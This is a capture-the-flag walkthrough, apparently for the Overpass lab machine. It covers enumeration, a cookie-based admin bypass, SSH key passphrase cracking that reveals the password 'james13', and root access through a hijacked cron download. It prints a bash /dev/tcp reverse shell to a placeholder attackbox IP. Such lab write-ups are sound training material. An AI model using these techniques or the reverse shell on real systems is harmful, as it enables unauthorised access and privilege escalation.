Prerequisites for this machine:-
- Familiarity with enumeration with Nmap and ffuf or gobuster
- Basic understanding of web applications and JavaScript
- Understanding of ssh
- Basic networking knowledge
Enumeration
To start off, we run an Nmap scan on the machine.
From the scan, we can see that two ports are open, 80 and 22.
Enumerating the site with ffuf gives us..
Getting the first flag
“/admin” looks interesting, checking out the page’s source code leads us to a file “login.js”
Looking at the “login()” function, we can see that if we have the “SessionToken” cookie, we’ll be able to access the admin panel.
Set the “SessionToken” cookie, changing the path to “/” and refresh the page.
And we have access to the admin panel, which gives us an RSA key.
We can copy this key over to a file “id_rsa”, and use ssh2john.py to transform the key into a format that John The Ripper can use.
After running John The Ripper on “id_rsa.hash”, we get the ssh password “james13” for the user “james” (see admin panel to find username).
Now we can ssh into the machine and get the first flag from “user.txt”.
Getting the second flag
Taking a look at “todo.txt” hints at a cron job running on the machine, we can find out what it is executing by listing “/etc/crontab”.
The machine is getting “buildscript.sh” from “overpass.thm”, we can exploit this by modifying the “/etc/hosts/” file, routing the machine to our attackbox.
Back on the attackbox, create the directory “/downloads/src”, and inside it, the script “buildscript.sh”.
To exploit the machine, we need to inject a reverse shell into buildscript.sh, you can find some examples here.
We can use this simple reverse shell and add it to our script.
bash -i >& /dev/tcp/ATTACKBOX_IP/8080 0>&1
Next, make sure buildscript.sh is executable
chmod +x buildscript.sh
After we’re done, we need to start a Netcat listener on our attackbox, make sure to start the listener on the same port used in the reverse shell, in this case, 8080.
In order to make the script accessible to the machine, we can start a simple server using Python.
After the cron job executes, we can see the machine requesting the file from the attackbox.
Back to the Netcat listener, we have a shell!
The final flag is in root.txt.